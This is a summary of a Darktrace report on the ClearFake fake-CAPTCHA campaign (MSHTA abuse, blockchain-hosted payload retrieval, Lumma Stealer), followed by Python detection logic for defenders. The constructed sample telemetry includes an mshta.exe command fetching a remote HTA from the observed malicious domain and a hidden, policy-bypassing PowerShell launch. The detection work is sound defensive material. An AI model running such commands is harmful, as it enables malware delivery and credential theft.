Darktrace reports on ClearFake, a campaign that combines fake CAPTCHAs with blockchain-driven payload retrieval. The activity was detected on a single endpoint over one day in November 2025 and involved repeated use of the legitimate Windows MSHTA utility (mshta[.]exe). The campaign frequently uses compromised WordPress sites and SEO poisoning to lure victims to fake CAPTCHA pages, where a PowerShell-based download is executed and malicious code is loaded.
In ClearFake operations, threat actors have abused MSHTA and connected to blockchain-backed infrastructure, such as a BNB Smart Chain endpoint, to retrieve configuration data and load payloads; the primary payload is typically an information stealer such as Lumma Stealer. Darktrace notes activity linking to weiss.neighb0rrol1[.]ru and other suspicious domains, and observes that this EtherHiding approach relies on smart contracts hosted on the BNB Smart Chain.
Autonomous Response was enabled to block the external connections and prevent HTA-driven payload delivery, containing the activity before any data exfiltration could occur. The report reiterates the warning signs: users should stay alert to social engineering, and defenders should monitor for unusual MSHTA usage and for outbound connections to similarly formatted domains.
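As an added illustration (not code from the Darktrace report), the following Python detection logic runs over constructed process and network events and flags the chain described above: mshta.exe launched with a remote URL, PowerShell spawned by mshta, and a connection from that process tree to a domain formatted like the one observed. The key=value event format, PIDs and the digit-substitution domain heuristic are assumptions for the example.

```python
import re

# Constructed sample telemetry, not from the report: process-creation and
# network events in a flat key=value format. The [.] defanging is kept in the
# sample so the domain is not clickable; suspicious_domain() strips it.
SAMPLE_EVENTS = [
    'type=process pid=4120 ppid=3300 image=explorer.exe cmd="explorer.exe"',
    'type=process pid=4511 ppid=4120 image=mshta.exe cmd="mshta.exe https://weiss.neighb0rrol1[.]ru/verify.hta"',
    'type=process pid=4602 ppid=4511 image=powershell.exe cmd="powershell.exe -w hidden -ep bypass -c ..."',
    'type=network pid=4602 dest=weiss.neighb0rrol1[.]ru:443',
    'type=process pid=5001 ppid=4120 image=mshta.exe cmd="mshta.exe C:\\Vendor\\setup.hta"',  # benign local HTA
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL = re.compile(r'https?://', re.I)
# Heuristic (assumption): a label mixing letters with only the digits 0/1 looks
# like a word with digit substitutions, e.g. "neighb0rrol1". Coarse by design.
LEET = re.compile(r'^(?=.*[a-z])(?=.*[01])[a-z01]+$')

def parse(line):
    return {k: v.strip('"') for k, v in KV.findall(line)}

def suspicious_domain(host):
    labels = host.replace('[.]', '.').lower().split('.')
    return any(LEET.match(lbl) for lbl in labels)

def descends_from_mshta(pid, proc):
    """Walk the parent chain of pid and report whether mshta.exe is an ancestor."""
    seen = set()
    while pid in proc and pid not in seen:
        seen.add(pid)
        if proc[pid]['image'].lower() == 'mshta.exe':
            return True
        pid = proc[pid]['ppid']
    return False

def detect(lines):
    events = [parse(l) for l in lines]
    proc = {e['pid']: e for e in events if e['type'] == 'process'}
    hits = []
    for e in events:
        if e['type'] == 'process' and e['image'].lower() == 'mshta.exe' and URL.search(e['cmd']):
            hits.append(('mshta_remote_url', e['pid']))        # HTA fetched from the network
        if e['type'] == 'process' and e['image'].lower().startswith('powershell'):
            parent = proc.get(e['ppid'])
            if parent and parent['image'].lower() == 'mshta.exe':
                hits.append(('mshta_spawns_powershell', e['pid']))
        if e['type'] == 'network':
            host = e['dest'].rsplit(':', 1)[0]
            if suspicious_domain(host) and descends_from_mshta(e['pid'], proc):
                hits.append(('mshta_chain_to_suspicious_domain', e['pid']))
    return hits
```

The local-HTA launch (pid 5001) produces no alert, so the rules key on the remote fetch and the process lineage rather than on mshta.exe alone.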